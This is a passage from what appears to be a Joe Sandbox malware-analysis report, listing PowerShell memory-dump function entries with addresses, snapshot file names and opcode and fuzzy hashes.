                                                                                                • Source File: 00000000.00000002.1790110342.00007FFB4B070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B070000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffb4b070000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d32e503fc6e302201a2e4c3d4b688f52d53144bc336156b4be5d50657d66297b
                                                                                                • Instruction ID: 68b3d99cf4fff576f7fe69422e85aff54f3c65c386ba2d1cca9e625bede7e383
                                                                                                • Opcode Fuzzy Hash: d32e503fc6e302201a2e4c3d4b688f52d53144bc336156b4be5d50657d66297b
                                                                                                • Instruction Fuzzy Hash: DCC16BA2A1DB861FFB59AA38D815275BBD1EF53311F0440BED6CDC32E3DC18A8468391
                                                                                                Function 00007FFB4B0721C4 Relevance: .1, Instructions: 97COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1790110342.00007FFB4B070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B070000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffb4b070000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f65ee6007c8ecef2b8e941b9b7cd55757ee7068e07cfa3797e330469c9cb1fdb
                                                                                                • Instruction ID: 900dacd2998b68ae4370df29de289bb33b7302d5ca29cda112f9eddde5998225
                                                                                                • Opcode Fuzzy Hash: f65ee6007c8ecef2b8e941b9b7cd55757ee7068e07cfa3797e330469c9cb1fdb
                                                                                                • Instruction Fuzzy Hash: EC215AA2E1DA4A5BF795FA389901274E2C2EF82312F5840BDD58DC32A3EC08EC024241
                                                                                                Function 00007FFB4AFA3BB5 Relevance: .0, Instructions: 49COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1789179988.00007FFB4AFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AFA0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffb4afa0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                • Instruction ID: 20575d03b5e14a63fda2e4936f776dc911a9af642a21bc1093589f9713bda765
                                                                                                • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                • Instruction Fuzzy Hash: A601677111CB0C8FD754EF0CE451AA5B7E0FB99364F10056DE58AC3691DA36E882CB45
                                                                                                Function 00007FFB4B072385 Relevance: .0, Instructions: 46COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1790110342.00007FFB4B070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B070000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffb4b070000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: aba22f67b3950cb493edc036bc2ecade2c5d642217326f2f5185a4072000e089
                                                                                                • Instruction ID: 97a316418ef00c982616c6f88e14025b2c2a0737eabae11d8225e42b735d7349
                                                                                                • Opcode Fuzzy Hash: aba22f67b3950cb493edc036bc2ecade2c5d642217326f2f5185a4072000e089
                                                                                                • Instruction Fuzzy Hash: BD01862050E3C45FE30BE73898156657FE1AF83700F5941EEE5C9C71B3C9695845C751

                                                                                                Executed Functions

                                                                                                Function 00007FFB4B0A3135 Relevance: .4, Instructions: 440COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1557944791.00007FFB4B0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0A0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffb4b0a0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ae74aba45e1877e93733e8a386c484703d722f159c606701088a2ebcc5514299
                                                                                                • Instruction ID: efddc2633e4b5bd25bfa959e8a40573ff643e3f75382750dd6629d27a2cc9528
                                                                                                • Opcode Fuzzy Hash: ae74aba45e1877e93733e8a386c484703d722f159c606701088a2ebcc5514299
                                                                                                • Instruction Fuzzy Hash: D2D136B290EA894FE796EF78C8655B9BFD0EF2A251B0804FED44DC71A3DD18A8058351
                                                                                                Function 00007FFB4AFD33B5 Relevance: .0, Instructions: 49COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1557067629.00007FFB4AFD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AFD0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffb4afd0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                • Instruction ID: 6b6563650c15b1ffacd61e6431c539ff0759dd3fb688b70474bf480bf2d27345
                                                                                                • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                • Instruction Fuzzy Hash: 8F01677111CB0C8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3691DB36E882CB45